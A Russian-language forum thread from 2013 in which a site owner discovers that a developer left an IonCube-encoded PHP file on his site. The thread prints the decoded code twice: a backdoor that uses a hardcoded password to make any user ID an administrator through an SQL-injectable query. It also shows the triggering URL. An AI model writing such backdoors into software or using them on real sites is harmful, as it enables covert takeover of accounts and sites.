Как запустить закодированный файл?

Тема в разделе "Как сделать...", создана пользователем saymong, 13 май 2013.

  1. saymong

    saymong

    Регистр.:
    29 сен 2010
    Сообщения:
    529
    Симпатии:
    373
    Здравствуйте.
    Вот такая проблема, на сайте есть закодированный файл (IonCube). После его раскодировки понял, что вечные проблемы с сайтом были из-за того, что тот кто писал сайт, положил туда такой код

    <?php
    include '../config.php';

    if (isset($_GET['pass']) && ($_GET['pass'] == '123456')) {
    $user = mysql_query('UPDATE `users` SET `admin` = \'1\' WHERE `uid` = \'' . $_GET['id'] . '\'');
    return 1;
    }

    echo '<script>document.location.href=\'../index.php\'</script>';
    exit();
    ?>


    и мог любого пользователя сделать админом. Но при попытке запустить его, у меня выходит ошибка
    PHP:
    Site errorthe file /home/username/public_html/admininstrator/version.php requires the ionCube PHP Loader ioncube_loader_lin_5.3.so to be installed by the website operator. If you are the website operator please use the ionCube Loader Wizard to assist with installation.
    Как же тогда его запускал тот, кто реально пару раз ставил мне пользователей админами.
    Я ввожу в адресную строку такой URL

    http://mysite.ru/admininstrator/version.php?pass=123456&id=1212

    По идее пользователь с ID 1212 должен стать админом... Верно ли я все делаю?
     
    Dead23Angel и FedorMaxx нравится это.
  2. Шумадан

    Шумадан Хабарра!!11

    Регистр.:
    6 фев 2008
    Сообщения:
    1.728
    Симпатии:
    2.105
    верно, в принципе файл
    не нужен, если то, что у вас спойлере это весь ваш код. можете также напрямую выполнить запрос в базу (параметры соединения берутся с config.php)

    а сам файл version.php выкинуть вообще, либо заменить его раскодированой версией. хотя это верная дыра
     
    saymong нравится это.
  3. saymong

    saymong

    Регистр.:
    29 сен 2010
    Сообщения:
    529
    Симпатии:
    373
    Если Вам не трудно, напишите (просто для проверки) код мне в ЛС чтоюы проверить. Просто сайт так стоял почти 3 месяца. Только руки до него дошли и тут такое.
    И что за ошибка выходит?
     
    FedorMaxx нравится это.
  4. Шумадан

    Шумадан Хабарра!!11

    Регистр.:
    6 фев 2008
    Сообщения:
    1.728
    Симпатии:
    2.105
    ошибка про то, что файл закодирован ионкубом и для его корректной загрузки и отработки на сервере нужно установить расширение (ионкуб лоадер).
     
  5. saymong

    saymong

    Регистр.:
    29 сен 2010
    Сообщения:
    529
    Симпатии:
    373
    Я уже понял это, Перевел ошибку)))
    А как именно запустить
    PHP:
    UPDATE `usersSET `admin` = 1 WHERE uid 1212
    Как его выполнить?
     
    FedorMaxx нравится это.
  6. saymong

    saymong

    Регистр.:
    29 сен 2010
    Сообщения:
    529
    Симпатии:
    373
    Странно, установил IonCube теперь ввожу
    http://mysite.ru/admininstrator/version.php?pass=123456&id=1212
    Страница стает белой и все на этом....
    Пользователь 1212 так и не стает админом. Либо файл глючит, либо я...
    Помогите понять что делаю не так...
     
    FedorMaxx нравится это.
  7. Шумадан

    Шумадан Хабарра!!11

    Регистр.:
    6 фев 2008
    Сообщения:
    1.728
    Симпатии:
    2.105
    это можно сделать в phpmyadmin, если он у вас есть на сервере

    должно по идее, если там код соответствует структуре базы
     
    FedorMaxx нравится это.
  8. saymong

    saymong

    Регистр.:
    29 сен 2010
    Сообщения:
    529
    Симпатии:
    373
    Ну через phpmyadmin - это понятно. А вот как делал это прогер (который писал скрипт) и который уже менял пользователей...

    Ладно, буду разбираться дальше.
    Спасибо всем за помощь.
    Тему можно закрыть.
     
    FedorMaxx нравится это.
  9. Шумадан

    Шумадан Хабарра!!11

    Регистр.:
    6 фев 2008
    Сообщения:
    1.728
    Симпатии:
    2.105
    попробуйте заменить файл на
     
    FedorMaxx нравится это.
  10. saymong

    saymong

    Регистр.:
    29 сен 2010
    Сообщения:
    529
    Симпатии:
    373
    Я понял причину. в коде либо сам автор напутал либо так задуманно. В общем через phpmyadmin получается сменить пользователя.
    но в коде путаница
    <?php
    include '../config.php';

    if (isset($_GET['pass']) && ($_GET['pass'] == '123456')) {
    $user = mysql_query('UPDATE `users` SET `admin` = \'1\' WHERE `uid` = \'' . $_GET['id'] . '\'');
    return 1;
    }

    echo '<script>document.location.href=\'../index.php\'</script>';
    exit();
    ?>
    UID - нет такого поля/таблицы в БД.

    Заменил файл, ничего...также белая страница...
     
    FedorMaxx нравится это.